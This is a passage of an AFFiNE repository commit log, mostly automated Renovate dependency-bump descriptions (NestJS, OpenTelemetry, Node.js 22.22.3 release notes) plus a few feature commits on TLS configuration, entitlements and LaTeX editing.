* Updated TLS library dependencies with pinned version constraints
across multiple packages
* Removed `tls-rustls` feature from sqlx configurations in backend and
frontend packages
  * Removed unused `sqlx` dependency from mobile native package
* Refined HTTPS client configuration with embedded certificate roots and
added validation test

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14970)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-15 01:02:07 +08:00
renovate[bot] d9cebdfc95 chore: bump up nestjs (#14968)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.20/11.1.21?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.20/11.1.21?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.20/11.1.21?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21?slim=true)
|
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) |
[`11.4.2` →
`11.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.2/11.4.3)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.4.2/11.4.3?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.20/11.1.21?slim=true)
|

---

### Release Notes

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/core)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-express)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-socket.io)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/swagger (@&#8203;nestjs/swagger)</summary>

###
[`v11.4.3`](https://redirect.github.com/nestjs/swagger/compare/11.4.2...0d79a3c9dea89236314609f8b18ec98b12c18692)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.2...11.4.3)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/websockets)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 23:39:14 +08:00
renovate[bot] 97d9ae3183 chore: bump up @opentelemetry/semantic-conventions version to v1.41.1 (#14962)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`1.40.0` →
`1.41.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsemantic-conventions/1.41.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1?slim=true)
|

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/semantic-conventions)</summary>

###
[`v1.41.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 18:25:55 +08:00
DarkSky c8cdc488db feat(server): entitlement primitive (#14964)
#### PR Dependency Tree


* **PR #14964** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added entitlement resolution to validate licenses and derive plan,
quotas, expiry and flags.
* Introduced persistent quota/entitlement state for users and workspaces
with legacy sync behavior.
* Real-time quota-state operations and change events for monitoring
usage.

* **Chores**
  * Updated workspace dependencies to add cryptography/hash crates.

* **Tests**
* Added native entitlement tests covering validation, quantity handling,
and signature/expiry cases.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14964)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 18:25:03 +08:00
Jachin 542da0b347 feat(editor): improve latex editing support (#14924)
## Summary
- support converting selected text into inline LaTeX equations
- support turning text blocks into LaTeX equation blocks
- add equation entries to editor toolbars while keeping inline equation
with text formatting actions

## Tests
- yarn tsc -b blocksuite/affine/inlines/latex/tsconfig.json
blocksuite/affine/blocks/note/tsconfig.json
blocksuite/affine/blocks/root/tsconfig.json
blocksuite/affine/rich-text/tsconfig.json
blocksuite/affine/widgets/keyboard-toolbar/tsconfig.json --pretty false
- git diff --check origin/canary...HEAD

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Equation block support with conversion from existing blocks.
  * Inline LaTeX insertion added to the inline formatting toolbar.
* Equation action added to the keyboard toolbar; Equation blocks
searchable via math/equation/latex aliases.

* **Improvements**
* Inline LaTeX editor opens and syncs more reliably; selection/convert
flow preserves distinct LaTeX values when converting in reverse order.

* **Tests**
  * New e2e tests for inline LaTeX conversions and value preservation.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14924)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 11:56:54 +08:00
renovate[bot] 7280fe33bc chore: bump up Node.js to v22.22.3 (#14961)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [node](https://nodejs.org)
([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.2`
→ `22.22.3` |

---

### Release Notes

<details>
<summary>nodejs/node (node)</summary>

###
[`v22.22.3`](https://redirect.github.com/nodejs/node/releases/tag/v22.22.3):
2026-05-13, Version 22.22.3 'Jod' (LTS), @&#8203;marco-ippolito

[Compare
Source](https://redirect.github.com/nodejs/node/compare/v22.22.2...v22.22.3)

##### Commits

-
\[[`4f780905c5`](https://redirect.github.com/nodejs/node/commit/4f780905c5)]
- **crypto**: fix potential null pointer dereference when
BIO\_meth\_new() fails (Nora Dossche)
[#&#8203;61788](https://redirect.github.com/nodejs/node/pull/61788)
-
\[[`4a09efb947`](https://redirect.github.com/nodejs/node/commit/4a09efb947)]
- **crypto**: update root certificates to NSS 3.121 (Node.js GitHub Bot)
[#&#8203;62485](https://redirect.github.com/nodejs/node/pull/62485)
-
\[[`e4c0d99839`](https://redirect.github.com/nodejs/node/commit/e4c0d99839)]
- **deps**: update timezone to 2026a (Node.js GitHub Bot)
[#&#8203;62164](https://redirect.github.com/nodejs/node/pull/62164)
-
\[[`0226c8dd7a`](https://redirect.github.com/nodejs/node/commit/0226c8dd7a)]
- **deps**: update simdjson to 4.5.0 (Node.js GitHub Bot)
[#&#8203;62382](https://redirect.github.com/nodejs/node/pull/62382)
-
\[[`e742ab748c`](https://redirect.github.com/nodejs/node/commit/e742ab748c)]
- **deps**: update sqlite to 3.51.3 (Node.js GitHub Bot)
[#&#8203;62256](https://redirect.github.com/nodejs/node/pull/62256)
-
\[[`73cac0571a`](https://redirect.github.com/nodejs/node/commit/73cac0571a)]
- **deps**: update amaro to 1.1.8 (Node.js GitHub Bot)
[#&#8203;62151](https://redirect.github.com/nodejs/node/pull/62151)
-
\[[`ae5c162b93`](https://redirect.github.com/nodejs/node/commit/ae5c162b93)]
- **deps**: update amaro to 1.1.7 (Node.js GitHub Bot)
[#&#8203;61730](https://redirect.github.com/nodejs/node/pull/61730)
-
\[[`b819cb9977`](https://redirect.github.com/nodejs/node/commit/b819cb9977)]
- **deps**: update amaro to 1.1.6 (Node.js GitHub Bot)
[#&#8203;61603](https://redirect.github.com/nodejs/node/pull/61603)
-
\[[`bbcce09dc7`](https://redirect.github.com/nodejs/node/commit/bbcce09dc7)]
- **deps**: update sqlite to 3.52.0 (Node.js GitHub Bot)
[#&#8203;62150](https://redirect.github.com/nodejs/node/pull/62150)
-
\[[`22ff2d81ce`](https://redirect.github.com/nodejs/node/commit/22ff2d81ce)]
- **deps**: update simdjson to 4.3.1 (Node.js GitHub Bot)
[#&#8203;61930](https://redirect.github.com/nodejs/node/pull/61930)
-
\[[`f49b51d75c`](https://redirect.github.com/nodejs/node/commit/f49b51d75c)]
- **deps**: update acorn-walk to 8.3.5 (Node.js GitHub Bot)
[#&#8203;61928](https://redirect.github.com/nodejs/node/pull/61928)
-
\[[`1a5cec0d49`](https://redirect.github.com/nodejs/node/commit/1a5cec0d49)]
- **deps**: update acorn to 8.16.0 (Node.js GitHub Bot)
[#&#8203;61925](https://redirect.github.com/nodejs/node/pull/61925)
-
\[[`d339497688`](https://redirect.github.com/nodejs/node/commit/d339497688)]
- **deps**: update nbytes to 0.1.3 (Node.js GitHub Bot)
[#&#8203;61879](https://redirect.github.com/nodejs/node/pull/61879)
-
\[[`3ff8ffd459`](https://redirect.github.com/nodejs/node/commit/3ff8ffd459)]
- **deps**: remove stale OpenSSL arch configs (René)
[#&#8203;61834](https://redirect.github.com/nodejs/node/pull/61834)
-
\[[`b8ddbc1e9a`](https://redirect.github.com/nodejs/node/commit/b8ddbc1e9a)]
- **deps**: update llhttp to 9.3.1 (Node.js GitHub Bot)
[#&#8203;61827](https://redirect.github.com/nodejs/node/pull/61827)
-
\[[`ffda97afd4`](https://redirect.github.com/nodejs/node/commit/ffda97afd4)]
- **deps**: update googletest to
[`2461743`](https://redirect.github.com/nodejs/node/commit/2461743991f9aa53e9a3625eafcbacd81a3c74cd)
(Node.js GitHub Bot)
[#&#8203;62484](https://redirect.github.com/nodejs/node/pull/62484)
-
\[[`79aa32cf4f`](https://redirect.github.com/nodejs/node/commit/79aa32cf4f)]
- **deps**: update googletest to
[`73a63ea`](https://redirect.github.com/nodejs/node/commit/73a63ea05dc8ca29ec1d2c1d66481dd0de1950f1)
(Node.js GitHub Bot)
[#&#8203;61927](https://redirect.github.com/nodejs/node/pull/61927)
-
\[[`b6957e13b6`](https://redirect.github.com/nodejs/node/commit/b6957e13b6)]
- **deps**: update archs files for openssl-3.5.6 (Node.js GitHub Bot)
[#&#8203;62629](https://redirect.github.com/nodejs/node/pull/62629)
-
\[[`3a27669063`](https://redirect.github.com/nodejs/node/commit/3a27669063)]
- **deps**: upgrade openssl sources to openssl-3.5.6 (Node.js GitHub
Bot) [#&#8203;62629](https://redirect.github.com/nodejs/node/pull/62629)
-
\[[`d568a1bb53`](https://redirect.github.com/nodejs/node/commit/d568a1bb53)]
- **deps**: upgrade npm to 10.9.8 (npm team)
[#&#8203;62463](https://redirect.github.com/nodejs/node/pull/62463)
-
\[[`ec11f3c1d5`](https://redirect.github.com/nodejs/node/commit/ec11f3c1d5)]
- **deps**: V8: backport
[`85b3900`](https://redirect.github.com/nodejs/node/commit/85b390089e51)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`08609712ed`](https://redirect.github.com/nodejs/node/commit/08609712ed)]
- **deps**: V8: backport
[`1b27e46`](https://redirect.github.com/nodejs/node/commit/1b27e4674f11)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`dcc60d5ab2`](https://redirect.github.com/nodejs/node/commit/dcc60d5ab2)]
- **deps**: V8: backport
[`9997fc0`](https://redirect.github.com/nodejs/node/commit/9997fc013952)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`1d1f4451fb`](https://redirect.github.com/nodejs/node/commit/1d1f4451fb)]
- **deps**: V8: cherry-pick
[`b96e40d`](https://redirect.github.com/nodejs/node/commit/b96e40d5ac85)
(Clemens Backes)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`2268567237`](https://redirect.github.com/nodejs/node/commit/2268567237)]
- **deps**: V8: cherry-pick
[`7cb6188`](https://redirect.github.com/nodejs/node/commit/7cb6188cf913)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`92804cdbea`](https://redirect.github.com/nodejs/node/commit/92804cdbea)]
- **deps**: V8: cherry-pick
[`e7ccf0a`](https://redirect.github.com/nodejs/node/commit/e7ccf0af1bdd)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`eae2c27a40`](https://redirect.github.com/nodejs/node/commit/eae2c27a40)]
- **deps**: V8: cherry-pick
[`8e214ec`](https://redirect.github.com/nodejs/node/commit/8e214ec3ec8c)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`a1799a49bb`](https://redirect.github.com/nodejs/node/commit/a1799a49bb)]
- **deps**: V8: backport
[`63b8849`](https://redirect.github.com/nodejs/node/commit/63b8849d73ae)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`a2df2d8731`](https://redirect.github.com/nodejs/node/commit/a2df2d8731)]
- **deps**: V8: backport
[`3239427`](https://redirect.github.com/nodejs/node/commit/323942700cfe)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`e3d65c7dca`](https://redirect.github.com/nodejs/node/commit/e3d65c7dca)]
- **deps**: V8: backport
[`89dc6ea`](https://redirect.github.com/nodejs/node/commit/89dc6eab605c)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`5e7db133de`](https://redirect.github.com/nodejs/node/commit/5e7db133de)]
- **deps**: V8: backport
[`910cb91`](https://redirect.github.com/nodejs/node/commit/910cb91733dc)
(Jakob Kummerow)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`d0c24a28af`](https://redirect.github.com/nodejs/node/commit/d0c24a28af)]
- **deps**: V8: cherry-pick
[`b8f91e5`](https://redirect.github.com/nodejs/node/commit/b8f91e510e0f)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`d358687824`](https://redirect.github.com/nodejs/node/commit/d358687824)]
- **deps**: V8: cherry-pick
[`cf03d55`](https://redirect.github.com/nodejs/node/commit/cf03d55db2a0)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`67c8b2c349`](https://redirect.github.com/nodejs/node/commit/67c8b2c349)]
- **deps**: V8: cherry-pick
[`692f3d5`](https://redirect.github.com/nodejs/node/commit/692f3d526a38)
(Sébastien Doeraene)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`71e5a59ffd`](https://redirect.github.com/nodejs/node/commit/71e5a59ffd)]
- **deps**: V8: cherry-pick
[`c734674`](https://redirect.github.com/nodejs/node/commit/c734674e03f9)
(Manos Koukoutos)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`f0dbe81c7b`](https://redirect.github.com/nodejs/node/commit/f0dbe81c7b)]
- **deps**: V8: cherry-pick
[`b2f3aea`](https://redirect.github.com/nodejs/node/commit/b2f3aea23a01)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`d333f480c3`](https://redirect.github.com/nodejs/node/commit/d333f480c3)]
- **deps**: V8: cherry-pick
[`5f1342c`](https://redirect.github.com/nodejs/node/commit/5f1342c20b59)
(Matthias Liedtke)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`db722725bb`](https://redirect.github.com/nodejs/node/commit/db722725bb)]
- **deps**: use npm undici\@&#8203;six tag in `update-undici.sh` (Matteo
Collina)
[#&#8203;63012](https://redirect.github.com/nodejs/node/pull/63012)
-
\[[`9b57979d9c`](https://redirect.github.com/nodejs/node/commit/9b57979d9c)]
- **doc**: add Rafael to last security release steward (Rafael Gonzaga)
[#&#8203;62423](https://redirect.github.com/nodejs/node/pull/62423)
-
\[[`d8075585bf`](https://redirect.github.com/nodejs/node/commit/d8075585bf)]
- **doc**: add path to vulnerabilities.json mention (Rafael Gonzaga)
[#&#8203;62355](https://redirect.github.com/nodejs/node/pull/62355)
-
\[[`6ec9a70204`](https://redirect.github.com/nodejs/node/commit/6ec9a70204)]
- **doc**: clarify fs.ReadStream and fs.WriteStream are not
constructable (Kit Dallege)
[#&#8203;62208](https://redirect.github.com/nodejs/node/pull/62208)
-
\[[`1fc86fcb6e`](https://redirect.github.com/nodejs/node/commit/1fc86fcb6e)]
- **doc**: add note (and caveat) for `mock.module` about customization
hooks (Jacob Smith)
[#&#8203;62075](https://redirect.github.com/nodejs/node/pull/62075)
-
\[[`491be80bd9`](https://redirect.github.com/nodejs/node/commit/491be80bd9)]
- **doc**: add efekrskl as triager (Efe)
[#&#8203;61876](https://redirect.github.com/nodejs/node/pull/61876)
-
\[[`18558293a3`](https://redirect.github.com/nodejs/node/commit/18558293a3)]
- **doc**: fix module.stripTypeScriptTypes indentation (René)
[#&#8203;61992](https://redirect.github.com/nodejs/node/pull/61992)
-
\[[`8e20976522`](https://redirect.github.com/nodejs/node/commit/8e20976522)]
- **doc**: explicitly mention Slack handle (Rafael Gonzaga)
[#&#8203;61986](https://redirect.github.com/nodejs/node/pull/61986)
-
\[[`70b8e6b4fb`](https://redirect.github.com/nodejs/node/commit/70b8e6b4fb)]
- **doc**: rename invalid `function` parameter (René)
[#&#8203;61942](https://redirect.github.com/nodejs/node/pull/61942)
-
\[[`4045c76f6c`](https://redirect.github.com/nodejs/node/commit/4045c76f6c)]
- **doc**: clarify status of feature request issues (Antoine du Hamel)
[#&#8203;61505](https://redirect.github.com/nodejs/node/pull/61505)
-
\[[`c54652f2aa`](https://redirect.github.com/nodejs/node/commit/c54652f2aa)]
- **doc**: remove incorrect mention of `module` in `typescript.md` (Rob
Palmer)
[#&#8203;61839](https://redirect.github.com/nodejs/node/pull/61839)
-
\[[`9fad6cedf5`](https://redirect.github.com/nodejs/node/commit/9fad6cedf5)]
- **doc**: clarify async caveats for `events.once()` (René)
[#&#8203;61572](https://redirect.github.com/nodejs/node/pull/61572)
-
\[[`2f1e5733fe`](https://redirect.github.com/nodejs/node/commit/2f1e5733fe)]
- **doc**: update Juan's security steward info (Juan José)
[#&#8203;61754](https://redirect.github.com/nodejs/node/pull/61754)
-
\[[`a64bdb5068`](https://redirect.github.com/nodejs/node/commit/a64bdb5068)]
- **doc**: fix overstated Date header requirement in response.sendDate
(Kit Dallege)
[#&#8203;62206](https://redirect.github.com/nodejs/node/pull/62206)
-
\[[`02797de923`](https://redirect.github.com/nodejs/node/commit/02797de923)]
- **doc**: fix small environment\_variables typo (chris)
[#&#8203;62279](https://redirect.github.com/nodejs/node/pull/62279)
-
\[[`f22ebdc809`](https://redirect.github.com/nodejs/node/commit/f22ebdc809)]
- **doc**: fix small logic error in DETECT\_MODULE\_SYNTAX (René)
[#&#8203;62025](https://redirect.github.com/nodejs/node/pull/62025)
-
\[[`9f4508062a`](https://redirect.github.com/nodejs/node/commit/9f4508062a)]
- **doc**: fix methods being documented as properties in `process.md`
(Antoine du Hamel)
[#&#8203;61765](https://redirect.github.com/nodejs/node/pull/61765)
-
\[[`3ea39ff135`](https://redirect.github.com/nodejs/node/commit/3ea39ff135)]
- **doc**: fix dropdown menu being obscured at <600px due to stacking
context (Jeff)
[#&#8203;61735](https://redirect.github.com/nodejs/node/pull/61735)
-
\[[`c22445079b`](https://redirect.github.com/nodejs/node/commit/c22445079b)]
- **doc**: fix spacing in process message event (Aviv Keller)
[#&#8203;61756](https://redirect.github.com/nodejs/node/pull/61756)
-
\[[`32831b5223`](https://redirect.github.com/nodejs/node/commit/32831b5223)]
- **doc**: fix broken links of net.md (YuSheng Chen)
[#&#8203;61673](https://redirect.github.com/nodejs/node/pull/61673)
-
\[[`005508d509`](https://redirect.github.com/nodejs/node/commit/005508d509)]
- **doc**: remove obsolete Boxstarter automated install (Mike McCready)
[#&#8203;61785](https://redirect.github.com/nodejs/node/pull/61785)
-
\[[`37c2fd6f7d`](https://redirect.github.com/nodejs/node/commit/37c2fd6f7d)]
- **esm**: fix path normalization in `finalizeResolution` (Antoine du
Hamel)
[#&#8203;62080](https://redirect.github.com/nodejs/node/pull/62080)
-
\[[`1769d74613`](https://redirect.github.com/nodejs/node/commit/1769d74613)]
- **esm**: populate separate cache for require(esm) in imported CJS
(Joyee Cheung)
[#&#8203;59679](https://redirect.github.com/nodejs/node/pull/59679)
-
\[[`ee02966ffc`](https://redirect.github.com/nodejs/node/commit/ee02966ffc)]
- **http**: fix keep-alive socket reuse race in requestOnFinish (Martin
Slota)
[#&#8203;61710](https://redirect.github.com/nodejs/node/pull/61710)
-
\[[`2fdb5ce6cc`](https://redirect.github.com/nodejs/node/commit/2fdb5ce6cc)]
- **http2**: fix FileHandle leak in respondWithFile (sangwook)
[#&#8203;61707](https://redirect.github.com/nodejs/node/pull/61707)
-
\[[`aa2c1eca04`](https://redirect.github.com/nodejs/node/commit/aa2c1eca04)]
- **lib**: fix source map url parse in dynamic imports (Chengzhong Wu)
[#&#8203;61990](https://redirect.github.com/nodejs/node/pull/61990)
-
\[[`785b00cbeb`](https://redirect.github.com/nodejs/node/commit/785b00cbeb)]
- **meta**: pass release version to release worker (flakey5)
[#&#8203;62777](https://redirect.github.com/nodejs/node/pull/62777)
-
\[[`447fb9a0b5`](https://redirect.github.com/nodejs/node/commit/447fb9a0b5)]
- **meta**: persist sccache daemon until end of build workflows (René)
[#&#8203;61639](https://redirect.github.com/nodejs/node/pull/61639)
-
\[[`5065a0acb3`](https://redirect.github.com/nodejs/node/commit/5065a0acb3)]
- **module**: do not invoke resolve hooks twice for imported cjs (Joyee
Cheung)
[#&#8203;61529](https://redirect.github.com/nodejs/node/pull/61529)
-
\[[`9a2e21305d`](https://redirect.github.com/nodejs/node/commit/9a2e21305d)]
- **module**: do not wrap module.\_load when tracing is not enabled
(Joyee Cheung)
[#&#8203;61479](https://redirect.github.com/nodejs/node/pull/61479)
-
\[[`b9240bc063`](https://redirect.github.com/nodejs/node/commit/b9240bc063)]
- **module**: fix sync resolve hooks for require with node: prefixes
(Joyee Cheung)
[#&#8203;61088](https://redirect.github.com/nodejs/node/pull/61088)
-
\[[`2e91b28aaf`](https://redirect.github.com/nodejs/node/commit/2e91b28aaf)]
- **module**: handle null source from async loader hooks in sync hooks
(Joyee Cheung)
[#&#8203;59929](https://redirect.github.com/nodejs/node/pull/59929)
-
\[[`39147c154e`](https://redirect.github.com/nodejs/node/commit/39147c154e)]
- **module**: use sync cjs when importing cts (Marco Ippolito)
[#&#8203;60072](https://redirect.github.com/nodejs/node/pull/60072)
-
\[[`12a2462b2c`](https://redirect.github.com/nodejs/node/commit/12a2462b2c)]
- **module**: only put directly require-d ESM into require.cache (Joyee
Cheung)
[#&#8203;59874](https://redirect.github.com/nodejs/node/pull/59874)
-
\[[`cf39566277`](https://redirect.github.com/nodejs/node/commit/cf39566277)]
- **src**: fix flags argument offset in JSUdpWrap (Weixie Cui)
[#&#8203;61948](https://redirect.github.com/nodejs/node/pull/61948)
-
\[[`578a9a9230`](https://redirect.github.com/nodejs/node/commit/578a9a9230)]
- **src**: clamp WriteUtf8 capacity to INT\_MAX in EncodeInto
(semimikoh)
[#&#8203;62621](https://redirect.github.com/nodejs/node/pull/62621)
-
\[[`57c3035fec`](https://redirect.github.com/nodejs/node/commit/57c3035fec)]
- **stream**: fix decoded fromList chunk boundary check (Thomas Watson)
[#&#8203;61884](https://redirect.github.com/nodejs/node/pull/61884)
-
\[[`57fb008bb8`](https://redirect.github.com/nodejs/node/commit/57fb008bb8)]
- **test**: update tls junk data error expectations (Filip Skokan)
[#&#8203;62629](https://redirect.github.com/nodejs/node/pull/62629)
-
\[[`363f9a9d18`](https://redirect.github.com/nodejs/node/commit/363f9a9d18)]
- **test**: skip `test-url` on `--shared-ada` builds (Antoine du Hamel)
[#&#8203;62019](https://redirect.github.com/nodejs/node/pull/62019)
-
\[[`daaead342b`](https://redirect.github.com/nodejs/node/commit/daaead342b)]
- **test**: simplify encodeInto large buffer regression test (semimikoh)
